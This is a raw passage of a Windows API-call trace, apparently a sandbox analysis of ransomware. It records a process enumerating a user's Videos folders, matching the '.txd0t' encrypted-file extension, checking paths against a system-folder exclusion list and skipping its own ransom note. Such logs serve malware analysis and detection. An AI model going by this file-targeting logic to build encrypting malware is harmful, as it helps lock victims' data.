psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="hrFHHxEDNXCX.swf.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t" [0090.316] PathFindExtensionW (pszPath="hrFHHxEDNXCX.swf.txd0t") returned=".txd0t" [0090.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.316] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12184, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4.txd0t", cAlternateFileName="P6NTF9~1.TXD")) returned 1 [0090.316] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2=".") returned 1 [0090.316] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2="..") returned 1 [0090.316] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="P6NtF9p_sziw.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t" [0090.317] PathFindExtensionW (pszPath="P6NtF9p_sziw.mp4.txd0t") returned=".txd0t" [0090.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.317] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12184, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4.txd0t", cAlternateFileName="P6NTF9~1.TXD")) returned 0 [0090.317] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0090.317] GetProcessHeap () returned 0xe30000 [0090.317] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7f28 | out: hHeap=0xe30000) returned 1 [0090.317] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 0 [0090.317] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.317] GetProcessHeap () returned 0xe30000 [0090.317] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.317] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5dd49c0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x681af900, ftLastAccessTime.dwHighDateTime=0x1d5efa8, ftLastWriteTime.dwLowDateTime=0x52dd2c43, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c03, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="e7C5rm59mT0uP_9f.avi.txd0t", cAlternateFileName="E7C5RM~1.TXD")) returned 1 [0090.317] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2=".") returned 1 [0090.317] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2="..") returned 1 [0090.317] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="e7C5rm59mT0uP_9f.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t" [0090.317] PathFindExtensionW (pszPath="e7C5rm59mT0uP_9f.avi.txd0t") returned=".txd0t" [0090.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.317] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1259ab0, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0x18935990, ftLastAccessTime.dwHighDateTime=0x1d5e23d, ftLastWriteTime.dwLowDateTime=0x52df8d7e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a26, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="gPsXouAw.flv.txd0t", cAlternateFileName="GPSXOU~1.TXD")) returned 1 [0090.317] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2=".") returned 1 [0090.317] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2="..") returned 1 [0090.317] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="gPsXouAw.flv.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t" [0090.317] PathFindExtensionW (pszPath="gPsXouAw.flv.txd0t") returned=".txd0t" [0090.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.317] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cb156b0, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0xd911ff70, ftLastAccessTime.dwHighDateTime=0x1d5eb64, ftLastWriteTime.dwLowDateTime=0x52df8d7e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15169, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GsXmIOztESVB3CY.mp4.txd0t", cAlternateFileName="GSXMIO~1.TXD")) returned 1 [0090.317] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2=".") returned 1 [0090.317] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2="..") returned 1 [0090.317] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="GsXmIOztESVB3CY.mp4.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t" [0090.318] PathFindExtensionW (pszPath="GsXmIOztESVB3CY.mp4.txd0t") returned=".txd0t" [0090.318] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.318] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c650b0, ftCreationTime.dwHighDateTime=0x1d5e2a5, ftLastAccessTime.dwLowDateTime=0xfc35a200, ftLastAccessTime.dwHighDateTime=0x1d5ea0f, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x21c8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="JbkR3ATa90b5U.avi.txd0t", cAlternateFileName="JBKR3A~1.TXD")) returned 1 [0090.318] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2=".") returned 1 [0090.318] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2="..") returned 1 [0090.318] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="JbkR3ATa90b5U.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t" [0090.318] PathFindExtensionW (pszPath="JbkR3ATa90b5U.avi.txd0t") returned=".txd0t" [0090.318] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.318] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ofxv0mmpKK_", cAlternateFileName="OFXV0M~1")) returned 1 [0090.318] StrCmpW (psz1="ofxv0mmpKK_", psz2=".") returned 1 [0090.318] StrCmpW (psz1="ofxv0mmpKK_", psz2="..") returned 1 [0090.318] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="ofxv0mmpKK_", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system32\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\local\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\boot\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\perflogs\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\programdata\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\drivers\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\wsus\\") returned 0x0 [0090.318] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="crypt_detect") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="cryptolocker") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="ransomware") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\WINDOWS") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.319] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files") returned 0x0 [0090.319] GetProcessHeap () returned 0xe30000 [0090.319] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xec7a58 [0090.319] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.319] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*" [0090.319] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.319] StrCmpW (psz1=".", psz2=".") returned 0 [0090.319] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.319] StrCmpW (psz1="..", psz2=".") returned 1 [0090.319] StrCmpW (psz1="..", psz2="..") returned 0 [0090.319] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e451c6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52e451c6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e451c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.319] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.319] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.319] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.319] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.319] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt" [0090.319] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.319] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.320] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.320] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aa47cd0, ftCreationTime.dwHighDateTime=0x1d5eda2, ftLastAccessTime.dwLowDateTime=0x4a2710d0, ftLastAccessTime.dwHighDateTime=0x1d5f0c7, ftLastWriteTime.dwLowDateTime=0x52e451c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdce3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9t0zT_40.mkv.txd0t", cAlternateFileName="9T0ZT_~1.TXD")) returned 1 [0090.320] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2=".") returned 1 [0090.320] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2="..") returned 1 [0090.320] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="9t0zT_40.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t" [0090.320] PathFindExtensionW (pszPath="9t0zT_40.mkv.txd0t") returned=".txd0t" [0090.320] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.320] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="a w2nq", cAlternateFileName="AW2NQ~1")) returned 1 [0090.320] StrCmpW (psz1="a w2nq", psz2=".") returned 1 [0090.320] StrCmpW (psz1="a w2nq", psz2="..") returned 1 [0090.320] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="a w2nq", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system32\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\local\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\boot\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\perflogs\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\programdata\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\drivers\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\wsus\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="crypt_detect") returned 0x0 [0090.321] StrStrIW 